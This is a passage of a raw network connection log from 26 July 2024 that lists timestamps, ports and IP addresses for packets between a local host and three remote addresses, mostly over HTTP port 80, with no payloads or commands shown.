Jul 26, 2024 18:56:50.197647095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.197659016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.197669029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.197681904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.197685957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.197721004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.205833912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.205867052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.205878973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.205919027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.205938101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.206151009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.206191063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.206201077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.206229925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.206253052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.206342936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.206353903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.206393003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.206455946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.206465960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.206476927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.206491947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.206523895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.206716061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.206727028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.206737041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.206747055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.206758022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.206762075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.206769943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.206784964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.206815004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.207060099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.207071066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.207082033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.207109928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.207123041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.217730999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.217746019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.217758894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.217794895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.217814922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.218072891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.218085051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.218096972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.218107939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.218122959 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.218154907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.235507965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.235538960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.235551119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.235567093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.235584021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.235591888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.235680103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.235697031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.235708952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.235721111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.235724926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.235738993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.235755920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.235980988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.235992908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.236004114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.236015081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.236059904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.236104965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.236118078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.236157894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.236300945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.236412048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.236465931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.236505032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.236608028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.236665010 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.236747980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.236759901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.236843109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.236880064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.237330914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.239430904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239490032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.239564896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239610910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.239732027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239743948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239756107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239767075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239778042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239784956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.239784956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.239792109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239804983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239808083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.239818096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239828110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239837885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239851952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239886045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239895105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.239897013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239895105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.239895105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.239908934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239921093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239932060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239933968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.239933968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.239944935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239954948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.239959002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239970922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239972115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.239983082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.239994049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240004063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240008116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240020990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240029097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240040064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240048885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240061045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240061045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240072966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240081072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240084887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240098000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240102053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240103006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240108013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240120888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240123987 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240135908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240147114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240149975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240155935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240158081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240160942 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240176916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240189075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240191936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240202904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240212917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240216017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240227938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240231037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240240097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240250111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240257978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240262032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240274906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240283012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240288019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240292072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240299940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240309954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240334988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240339041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240350008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240386009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240530014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240541935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.240575075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.240592003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.281297922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.281316042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.281327963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.281388044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.281388044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.281405926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.281419039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.281430960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.281440973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.281450033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.281457901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.281476974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.281488895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.288330078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.288348913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.288362980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.288430929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.288430929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.288463116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.288475990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.288499117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.288511992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.288515091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.288532972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.288552046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.296360016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.296375990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.296390057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.296463013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.296515942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.296528101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.296540022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.296551943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.296562910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.296564102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.296585083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.296602011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.296770096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.296782017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.296793938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.296817064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.296828985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.296837091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.296837091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.296840906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.296854019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.296855927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.296869993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.296895027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.297157049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.297168016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.297184944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.297197104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.297208071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.297208071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.297219992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.297224998 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.297243118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.297254086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.309464931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.309540033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.309551954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.309598923 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.309612989 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.309799910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.309814930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.309827089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.309838057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.309854031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.309864044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.309880972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.328361034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328377008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328387976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328397989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328408957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328418970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328428984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328435898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.328453064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.328473091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328474998 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.328491926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328504086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328515053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328516006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.328526020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328537941 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.328543901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.328543901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328557014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328564882 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.328568935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328582048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.328598976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.328617096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.328640938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328653097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328663111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328674078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328680992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.328685999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328700066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.328712940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.328732014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.328792095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328876972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.328919888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.329159021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.329171896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.329199076 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.329210043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.329298019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.329309940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.329325914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.329336882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.329346895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.329355001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.329365969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.329387903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.329792023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.329802990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.329813004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.329832077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.329843998 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.329941034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.329952002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.329961061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.329972982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.329981089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.329992056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.330008984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.330085039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.330096960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.330107927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.330118895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.330121994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.330136061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.330159903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.330260992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.330272913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.330282927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.330293894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.330311060 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.330323935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.330341101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.330702066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.330713034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.330744028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.330755949 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.330894947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.330905914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.330916882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.330926895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.330946922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.330959082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.331042051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.333329916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:51.317775011 CEST	49759	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:51.317822933 CEST	443	49759	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:51.320641041 CEST	49759	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:51.326917887 CEST	49759	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:51.326929092 CEST	443	49759	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:52.003181934 CEST	49760	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:52.003268957 CEST	443	49760	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:52.003369093 CEST	49760	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:52.004801035 CEST	49760	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:52.004831076 CEST	443	49760	172.67.213.85	192.168.2.4
